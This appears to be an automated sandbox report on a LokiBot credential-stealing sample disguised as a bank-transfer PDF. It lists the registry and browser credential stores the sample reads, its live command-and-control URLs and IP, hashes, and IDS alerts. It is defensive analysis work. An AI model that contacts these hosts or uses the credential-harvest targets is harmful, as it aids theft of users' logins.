Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	111 Process Injection	11 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Credentials in Registry	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	13 Software Packing	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Timestomp	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
transferencia bancaria.pdf.exe	12%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
transferencia bancaria.pdf.exe	21%	Virustotal		Browse
transferencia bancaria.pdf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sempersim.su	21%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://sempersim.su/gl21/fre.php	0%	Avira URL Cloud	safe
http://sempersim.su/gl21/fre.php	19%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sempersim.su	91.142.77.45	true	true	21%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://sempersim.su/gl21/fre.php	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.142.77.45	sempersim.su	Russian Federation		48720	VTSL1-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736955
Start date and time:	2022-11-03 12:28:50 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	transferencia bancaria.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@40/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:29:57	API Interceptor	38x Sleep call for process: transferencia bancaria.pdf.exe modified

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	884BB48A55DA67B4812805CB8905277D
SHA1:	6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
SHA-256:	78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
SHA-512:	989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.908301217464369
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	transferencia bancaria.pdf.exe
File size:	811008
MD5:	355efb2e1f7dd361f8e7cda449a45eac
SHA1:	864f8d367c72d37347e2dc8fa799cc9a2550d66c
SHA256:	cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
SHA512:	696a0d695e86094c35abf41001c607fa3df61bbf5cb7bf11feadd4bd434a67ce31628106c71688e8782f4e326e71aaced83b031764c4214832df455329edc8c5
SSDEEP:	12288:dR/AN9w7DTIJ0ycSou3KRdwHDI3tRG/8wSRDfs2sFLTAehm8buS89W:3XXEyycSDAwHNi8TAqbD
TLSH:	8005E00F8AE6460ED66936B865F0EFB75799DC01F44BC35B17CA6E4BB8432308211BD9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|#...............0..X...........v... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4c761e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc75cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xca000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc75b0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc5624	0xc5800	False	0.712665644778481	data	6.915983824184794	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0x370	0x400	False	0.365234375	data	2.7841237517285475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xca000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc8058	0x314	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59881	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56122	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440	TCP	2025381	ET TROJAN LokiBot Checkin	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49713	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49718	91.142.77.45	192.168.2.6
